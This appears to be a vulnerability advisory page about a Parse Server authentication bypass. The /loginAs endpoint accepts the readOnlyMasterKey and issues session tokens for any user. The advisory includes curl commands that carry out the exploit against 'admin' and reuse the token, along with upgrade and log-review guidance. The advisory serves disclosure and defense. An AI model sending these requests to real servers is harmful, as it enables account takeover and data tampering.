parse-server, Authentication Bypass, CVE-pending (High)

Listen to this Post

The vulnerability resides in the `/loginAs` endpoint of Parse Server. This endpoint is designed to allow a privileged `masterKey` to generate a session token for any user, facilitating administrative impersonation. Due to insufficient authorization checks, the endpoint also accepts the `readOnlyMasterKey` – a key intended only for read-only operations and with lower privileges. An attacker in possession of the `readOnlyMasterKey` can send a POST request to `/loginAs` with a target user’s username or ID. The server erroneously processes the request and returns a valid session token for that user. With this token, the attacker can then perform any action as the impersonated user, including creating, modifying, or deleting data, effectively bypassing the read‑only restriction. The flaw affects all deployments that use the `readOnlyMasterKey` feature. The root cause is the lack of a check to reject the `readOnlyMasterKey` in the handler for /loginAs. The fix introduces an explicit verification that blocks the `readOnlyMasterKey` from accessing this endpoint. No workaround exists other than avoiding the use of `readOnlyMasterKey` entirely until patched. The issue was reported and addressed in Parse Server versions 8.6.6 and 9.5.0-alpha.4. The vulnerability is rated high because it allows complete account takeover using a key that was supposed to be restricted to read access only.

dailycve form:

Platform: Parse Server
Version: <8.6.6, 9.0.0-9.5.0-alpha.3
Vulnerability: Authentication Bypass
Severity: High
date: 2026-03-05

Prediction: Fix: 2026-03-05

What Undercode Say:

Check your Parse Server version:

npm list parse-server
or if installed globally:
parse-server --version

Simulate a vulnerable request (do not use on production):

Replace <readOnlyMasterKey> and <targetUser> with actual values
curl -X POST \
-H "X-Parse-Master-Key: <readOnlyMasterKey>" \
-H "X-Parse-Application-Id: YOUR_APP_ID" \
-H "Content-Type: application/json" \
-d '{"username":"<targetUser>"}' \
https://your-parse-server.com/parse/loginAs

If successful, the response contains a session token. Use it to impersonate:

curl -H "X-Parse-Session-Token: <returned_session_token>" \
https://your-parse-server.com/parse/users/me

Exploit:

An attacker with the `readOnlyMasterKey` can execute:

curl -X POST \
-H "X-Parse-Master-Key: THE_READ_ONLY_KEY" \
-H "X-Parse-Application-Id: APP_ID" \
-d '{"username":"admin"}' \
https://target.com/parse/loginAs

The response contains a session token for the `admin` user. The attacker then uses this token to gain full read/write access.

Protection from this CVE

  1. Upgrade to patched versions: 8.6.6 or 9.5.0-alpha.4 (or later).
  2. If immediate upgrade is not possible, avoid using `readOnlyMasterKey` in your deployment.
  3. Review access logs for unusual `/loginAs` requests originating from the readOnlyMasterKey.

Impact:

  • Privilege Escalation: A read‑only key gains full administrative control.
  • Data Breach: Attackers can read, modify, or delete any user data.
  • Account Takeover: Any user account can be impersonated, leading to complete compromise of user‑specific data and actions.
  • Service Disruption: Malicious deletion of critical data or configurations may occur.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Previous

openCryptoki, Symlink Following, CVE-2026-23893 (Medium)

Scroll to Top